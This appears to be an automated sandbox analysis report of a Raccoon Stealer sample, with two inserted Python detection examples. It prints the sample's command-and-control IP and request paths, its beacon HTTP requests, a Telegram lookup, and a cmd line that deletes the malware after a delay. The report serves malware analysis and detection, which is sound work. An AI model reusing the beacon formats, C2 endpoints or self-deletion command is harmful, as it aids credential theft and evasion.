                      Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427958773.000000004BC86000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427854051.0000000002E8E000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.428000904.000000004BC86000.00000004.00000010.sdmpString found in binary or memory: http://91.219.236.69/
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmpString found in binary or memory: http://91.219.236.69//l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmpString found in binary or memory: http://91.219.236.69//l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b04
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.427958773.000000004BC86000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.428000904.000000004BC86000.00000004.00000010.sdmpString found in binary or memory: http://91.219.236.69:80/_netfx4-system.web.routing_b03f5f7f11d50a3a_4.0.15671.0_none_a9bac3c753caa48
                      Source: ldap60.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: ldap60.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmp, nssckbi.dll.0.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                      Source: ldap60.dll.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                      Source: ldap60.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: ldap60.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: ldap60.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: ldap60.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                      Source: nssckbi.dll.0.drString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://ocsp.accv.es0
                      Source: ldap60.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: ldap60.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                      Source: ldap60.dll.0.drString found in binary or memory: http://ocsp.thawte.com0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://policy.camerfirma.com0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://repository.swisssign.com/0
                      Source: ldap60.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                      Source: ldap60.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                      Source: ldap60.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                      Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.accv.es00
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.certicamara.com/dpc/0Z
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.chambersign.org1
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.firmaprofesional.com/cps0
                      Source: mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: ldap60.dll.0.drString found in binary or memory: http://www.mozilla.com0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.quovadis.bm0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.quovadisglobal.com/cps0
                      Source: sqlite3.dll.0.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: nssckbi.dll.0.drString found in binary or memory: https://ocsp.quovadisoffshore.com0
                      Source: nssckbi.dll.0.drString found in binary or memory: https://repository.luxtrust.lu0
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: nssckbi.dll.0.drString found in binary or memory: https://www.catcert.net/verarrel
                      Source: nssckbi.dll.0.drString found in binary or memory: https://www.catcert.net/verarrel05
                      Source: ldap60.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 91.219.236.69
                      Source: unknownDNS traffic detected: queries for: t.me
                      Source: global trafficHTTP traffic detected: GET /masterdanteloma HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
                      Source: global trafficHTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/762b827e1bbc7bd715bf97e0fb01fbddd5bf5ab2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.69
                      Source: global trafficHTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.69
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49766 version: TLS 1.2
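The three HTTP requests above share the traits the overview flags: no User-Agent header, a bare-IP Host for the POST to /, a 128-byte text/plain body, and a Content-Type header on a body-less GET to t.me. The Python below is an added example, not part of the report, that parses a raw request and counts those traits. The request bytes are reconstructed from the header lines printed above (the report collapses the CRLFs), and the 128-byte POST body is a placeholder of 'A' bytes because the report does not show its contents. The Cache-Control/Pragma no-cache pair is treated as a weak signal; browsers also send it on a forced reload, so it only adds to a score, never decides one.

```python
import ipaddress
from typing import Dict, List, Tuple

# Constructed raw requests reproducing the header sets listed in the report.
C2_POST = (
    b"POST / HTTP/1.1\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Pragma: no-cache\r\n"
    b"Content-Type: text/plain; charset=UTF-8\r\n"
    b"Content-Length: 128\r\n"
    b"Host: 91.219.236.69\r\n"
    b"\r\n" + b"A" * 128  # placeholder body: the real 128 bytes are not in the report
)
TELEGRAM_GET = (
    b"GET /masterdanteloma HTTP/1.1\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Pragma: no-cache\r\n"
    b"Content-Type: text/plain; charset=UTF-8\r\n"
    b"Host: t.me\r\n"
    b"\r\n"
)
BROWSER_GET = (  # constructed benign request for comparison
    b"GET / HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Accept: text/html\r\n"
    b"\r\n"
)


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def is_literal_ip(host: str) -> bool:
    """True when the Host header is an IP literal rather than a name."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def c2_indicators(raw: bytes) -> List[str]:
    """Return the list of traits from this report that the request exhibits."""
    method, target, h, _body = parse_request(raw)
    hits: List[str] = []
    if "user-agent" not in h:
        hits.append("no User-Agent")
    if is_literal_ip(h.get("host", "")):
        hits.append("Host is a bare IP")
    if method == "POST" and h.get("content-type", "").startswith("text/plain") and target == "/":
        hits.append("text/plain POST to /")
    if method == "GET" and "content-type" in h:
        hits.append("Content-Type on a body-less GET")
    if h.get("cache-control") == "no-cache" and h.get("pragma") == "no-cache":
        hits.append("Cache-Control/Pragma no-cache pair (weak)")
    return hits


def score(raw: bytes) -> int:
    """Number of indicators; a practitioner would alert at 3 or more."""
    return len(c2_indicators(raw))


if __name__ == "__main__":
    for label, req in (("C2 POST", C2_POST), ("t.me GET", TELEGRAM_GET), ("browser", BROWSER_GET)):
        print(f"{label:>9}: {score(req)} {c2_indicators(req)}")
```

The GET to t.me is plaintext HTTP/1.1 in the report; the TLS 1.2 session to 149.154.167.99:443 listed above is a separate connection and is not scored here.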

                      E-Banking Fraud:

                      Yara detected Raccoon Stealer
                      Source: Yara matchFile source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR
                      Source: Tk6dsSEyOC.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0041C217
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004362A1
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0041E6DA
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040E727
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00410AD2
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00434CB5
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0041AD32
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0043CD97
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0041D364
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040D560
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040F78B
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00415816
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00427AAA
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00429B40
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040DC7B
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0041DD0B
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00435E43
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0044C1E6
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0043C20A
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0042035B
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004103F7
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0044C443
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004185E7
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0042862C
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: String function: 00466770 appears 89 times
                      Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-interlocked-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-stdio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-util-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-processthreads-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-private-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-process-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-synch-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-timezone-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-file-l2-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-handle-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-synch-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-profile-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-math-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-time-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-locale-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-processthreads-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-utility-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-conio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-convert-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-runtime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-file-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-memory-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-environment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.427951428.000000004BC7E000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.373328236.0000000002EE2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.483474987.000000006FD92000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.373618716.000000004BC7F000.00000004.00000010.sdmpBinary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.376545109.0000000002EDD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIA2Marshal.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.427974547.0000000002EE6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.481321705.000000004BC7E000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.372509130.0000000002EE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAccessibleMarshal.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.372483857.000000004BC51000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameAccessibleMarshal.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.373284353.000000004BC7E000.00000004.00000010.sdmpBinary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.427918812.0000000002EDD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.373416548.000000004BC7E000.00000004.00000010.sdmpBinary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.483336296.000000006EEEB000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenss3.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.376567749.000000004BC7F000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameIA2Marshal.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.378183747.0000000002EDD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameldap60.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameldap60.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.373424728.0000000002EE2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.373403037.000000004BC7E000.00000004.00000010.sdmpBinary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.373313194.000000004BC7E000.00000004.00000010.sdmpBinary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Tk6dsSEyOC.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: sqlite3.dll.0.drStatic PE information: Number of sections : 18 > 10
                      Source: Tk6dsSEyOC.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Tk6dsSEyOC.exeVirustotal: Detection: 49%
                      Source: Tk6dsSEyOC.exeReversingLabs: Detection: 54%
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\Tk6dsSEyOC.exe "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dll
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\Local\Temp\KVOjaLhCnJ.exe
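The cmd.exe child above is the self-deletion the overview attributes to the sample (Self deletion via cmd delete; Sigma: Suspicious Del in CommandLine): a 10-second timeout, then del of the parent's own image path. Below is an added Python example, not from the report, of the check a process-creation detection would run. It flags a cmd.exe whose command line deletes exactly its parent's image, grading the hit higher when a delay precedes the delete; it generalizes past the report to the ping -n delay and the erase alias, which are common substitutes for the same trick. The events are constructed: the first reproduces the command line in the report, the others are added variants and benign noise, and the field names mirror Sysmon event 1 (ParentImage, Image, CommandLine) as an assumption about the log source.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcessEvent:
    """Minimal process-creation record (the Sysmon EID 1 fields that matter here)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample events. The first mirrors the command line in the report;
# the rest are added variants and benign noise.
SAMPLE_EVENTS = [
    ProcessEvent(
        parent_image=r"C:\Users\user\Desktop\Tk6dsSEyOC.exe",
        image=r"C:\Windows\SysWOW64\cmd.exe",
        command_line=r'cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"',
    ),
    ProcessEvent(  # ping-as-sleep variant with the erase alias (constructed)
        parent_image=r"C:\Users\user\AppData\Local\Temp\dropper.exe",
        image=r"C:\Windows\System32\cmd.exe",
        command_line=r"cmd /c ping -n 5 127.0.0.1 > nul && erase /q C:\Users\user\AppData\Local\Temp\dropper.exe",
    ),
    ProcessEvent(  # benign: deletes a log file, not the parent binary
        parent_image=r"C:\Program Files\Installer\setup.exe",
        image=r"C:\Windows\System32\cmd.exe",
        command_line=r'cmd.exe /c del /q "C:\Users\user\AppData\Local\Temp\setup.log"',
    ),
    ProcessEvent(  # benign: a delay with no delete at all
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\cmd.exe",
        command_line="cmd.exe /c timeout /T 10 /NOBREAK",
    ),
]

# A sleep substitute: "timeout [/T] N" or "ping -n N"
DELAY_RE = re.compile(r"\b(timeout(\.exe)?\s+(/t\s+)?\d+|ping(\.exe)?\s+-n\s+\d+)", re.IGNORECASE)
# "del" or "erase", optional switches, then a quoted or bare target path (group 3)
DELETE_RE = re.compile(r'\b(del|erase)(\s+/[a-z]+)*\s+("[^"]+"|\S+)', re.IGNORECASE)


def norm_path(path: str) -> str:
    """Strip quotes and normalise separators/case so paths compare reliably."""
    return path.strip('"').replace("/", "\\").lower()


def self_delete_verdict(ev: ProcessEvent) -> Optional[str]:
    """Grade a cmd.exe child that deletes its own parent.

    "high"   : a delay (timeout or ping -n) precedes del/erase of the parent image
    "medium" : del/erase of the parent image without a visible delay
    None     : no match
    """
    if not ev.image.lower().endswith("\\cmd.exe"):
        return None
    m = DELETE_RE.search(ev.command_line)
    if not m:
        return None
    if norm_path(m.group(3)) != norm_path(ev.parent_image):
        return None  # deleting something other than its own binary
    delayed = DELAY_RE.search(ev.command_line) is not None
    return "high" if delayed else "medium"


def scan(events: List[ProcessEvent]) -> List[Tuple[str, str]]:
    """Return (parent image, verdict) for every event that matches."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        verdict = self_delete_verdict(ev)
        if verdict:
            hits.append((ev.parent_image, verdict))
    return hits


if __name__ == "__main__":
    for parent, verdict in scan(SAMPLE_EVENTS):
        print(f"{verdict:>6}: {parent}")
```

Matching the deleted path against the parent image, rather than alerting on any del, is what keeps this rule quiet on installers and build scripts that clean up temporary files.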
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/68@1/8
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004279D5 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile read: C:\Program Files (x86)\desktop.ini
                      Source: softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                      Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
